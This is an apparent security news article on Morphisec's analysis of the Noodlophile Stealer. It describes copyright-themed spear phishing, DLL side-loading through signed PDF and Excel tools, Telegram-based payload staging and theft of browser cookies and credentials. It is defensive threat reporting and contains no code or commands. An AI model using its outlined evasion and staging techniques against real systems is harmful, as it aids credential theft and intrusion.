Beyond AI Lures: Noodlophile Stealer Evolves with Stealthy Copyright Phishing

The Noodlophile Stealer, a malware family first exposed for distributing through fake AI video-generation platforms, has resurfaced with new tactics. According to Morphisec, “the Noodlophile Stealer… has evolved into a highly targeted threat exploiting enterprises with significant Facebook footprints.”

This upgraded campaign blends sophisticated spear phishing with advanced malware staging and enhanced data theft capabilities, marking a dangerous step forward in the threat actor’s arsenal.

Phishing campaigns exploiting copyright infringement claims are not new, but this campaign elevates the approach. The report explains: “The Noodlophile campaign… now leverages advanced spear phishing emails posing as copyright infringement notices, tailored with reconnaissance-derived details like specific Facebook Page IDs and company ownership information.”

The emails, often originating from Gmail accounts to evade suspicion, carry legal threats and urgent calls to action. Victims are lured with links disguised as evidence files — such as “View Copyright Infringement Evidence.pdf” — and localized in multiple languages (English, Spanish, Polish, Latvian), likely with the help of AI.

Unlike earlier campaigns, the updated Noodlophile variant uses legitimate, signed applications vulnerable to DLL side-loading. Morphisec highlights that attackers exploited Haihaisoft PDF Reader and Excel converters, leveraging two main techniques:

• “Recursive Stub Loading” – a small stub DLL loads additional malicious DLLs via Import Address Table dependencies.
• “Chained DLL Vulnerabilities” – malicious code executes covertly through legitimate DLLs with their own side-loading flaws.

Payloads are delivered through Dropbox archives masked by TinyURL or other redirectors, with disguised batch scripts posing as .docx or .png files.

A notable innovation in this campaign is the use of Telegram for payload staging. The analysis reveals: “These scripts extract a URL from the description of a Telegram group, enabling dynamic execution of the payload.”

The final stealer is often hosted on free platforms like paste[.]rs, with heavy obfuscation and in-memory execution to evade traditional detection methods. Combined with LOLBin abuse (such as certutil.exe), the malware achieves stealth and persistence.

Morphisec’s code analysis uncovered unimplemented functions that point to rapid evolution. The report notes placeholders for screenshot capture, keylogging, file exfiltration, process monitoring, network reconnaissance, file encryption, and browser history extraction.

Currently, the stealer zeroes in on browser data, especially Facebook-related information. It “extracts Web Data, AutoFills, and cookies, with a special emphasis on cookies.sqlite for stealing Facebook cookies.” In addition, it retrieves saved credit card details, enumerates antivirus software, and gathers system information.

Persistence is established via registry entries and the Programs\Startup directory, while self-deletion techniques help cover its tracks.

The Noodlophile Stealer’s evolution into copyright phishing attacks highlights how attackers weaponize brand reputation risks against enterprises. Security leaders should strengthen phishing defenses, monitor for DLL side-loading activity, and remain vigilant against Telegram-based staging.

Related Posts:

• AI Tools Turn Trojan: Fake Video Platforms Drop Noodlophile Stealer and XWorm Payloads
• Warning: DLL Hijacking in Modern Malware Campaigns
• Cybercriminals Go Mobile: Executives Targeted in Advanced Phishing Campaigns